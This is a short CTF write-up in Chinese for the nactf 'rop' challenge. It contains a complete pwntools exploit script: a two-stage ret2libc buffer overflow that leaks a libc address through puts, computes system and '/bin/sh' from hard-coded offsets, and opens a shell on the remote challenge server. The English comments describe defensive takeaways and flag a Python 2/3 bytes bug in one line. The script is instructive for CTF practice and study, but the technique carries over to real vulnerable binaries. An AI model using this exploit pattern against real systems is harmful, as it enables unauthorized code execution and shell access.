###### tags: `nactf`
# rop(300)
- 標準rop,差在要print出伺服器的libc address
- 做法跟leak libc一樣,只是要print出來,ex:print puts_got,再拿值去網站找
```python=
# Two-stage ret2libc chain for the "rop" challenge.
#   stage 1: overflow -> puts(&GOT[__libc_start_main]) -> return to main   (leaks a libc pointer)
#   stage 2: overflow -> ret ; pop rdi ; &"/bin/sh" ; system                (uses the leak)
# All gadget / GOT / libc offsets below are challenge-specific constants.
# The fixed 0x40xxxx addresses imply the target binary was linked without PIE
# (inferred from the values; confirm with checksec).
# Defensive takeaway: a stack canary would stop the overwrite and PIE would remove
# the fixed gadget/GOT addresses; ASLR alone is defeated by the stage-1 leak.
from pwn import *
context.arch = 'amd64'
# Local copy of the libc the remote is believed to run. `l` is only referenced by
# the commented-out lines further down; the offsets actually used are hard-coded.
l = ELF('/home/test/Desktop/libc6_2.32-0ubuntu2_amd64.so')
#y = process("./dro")
y= remote("challenges.ctfd.io",30261)
# ROP gadgets and symbols in the (non-PIE) challenge binary.
pop_rdi = 0x401203
ret = 0x40101a
puts_plt = 0x401030
libc_start_main_got = 0x403fe8
puts_got = 0x403fc8          # not used below; alternative leak target (see comment in the chain)
main = 0x401146
# Stage 1 payload: 56 bytes of padding up to the saved return address (challenge-
# specific; presumably no stack canary in the way — verify with checksec), then
# puts(GOT entry of __libc_start_main) and a return into main for a second overflow.
p = flat(
'a' * 56,
pop_rdi,
libc_start_main_got,
# puts_got,  -- alternative leak target, used to identify the server's libc build
puts_plt,
main
)
y.sendlineafter('?',p)
y.recvline()
#print(hex(u64(y.recv(6) + '\0\0'))) -- print the raw leak to look up the server's libc
# puts prints the 6 significant bytes of the pointer; pad to 8 and unpack.
# NOTE(review): under Python 3 pwntools, recv() returns bytes and '\0\0' is str,
# so this concatenation raises TypeError (it would need b'\0\0'); the script as
# written appears to target the Python 2 API (see the print statements below).
# 0x28bc0 is presumably the offset of __libc_start_main in libc6_2.32-0ubuntu2
# (the GOT slot read above is the one for __libc_start_main) — TODO confirm against the ELF.
libc = u64(y.recv(6) + '\0\0') - 0x28bc0
success('libc ->%s' %hex( libc))
#print'libc ->',hex( l.address)
#print '"/bin/sh" str:' ,hex( l.search('/bin/sh').next())
# Hard-coded offsets into the same libc build: system and a "/bin/sh" string.
system_off = 0x503c0
system_func_ptr = libc + system_off
bin_sh = libc + 0x1ae41f
# Stage 2 payload: same padding, then system("/bin/sh"). The lone `ret` before
# pop_rdi is commonly inserted to keep the stack 16-byte aligned before calling
# system — assumption, not verifiable from here.
p = flat(
'a' * 56,
ret,
pop_rdi,
bin_sh,
system_func_ptr
)
y.sendlineafter('?',p)
y.interactive()
```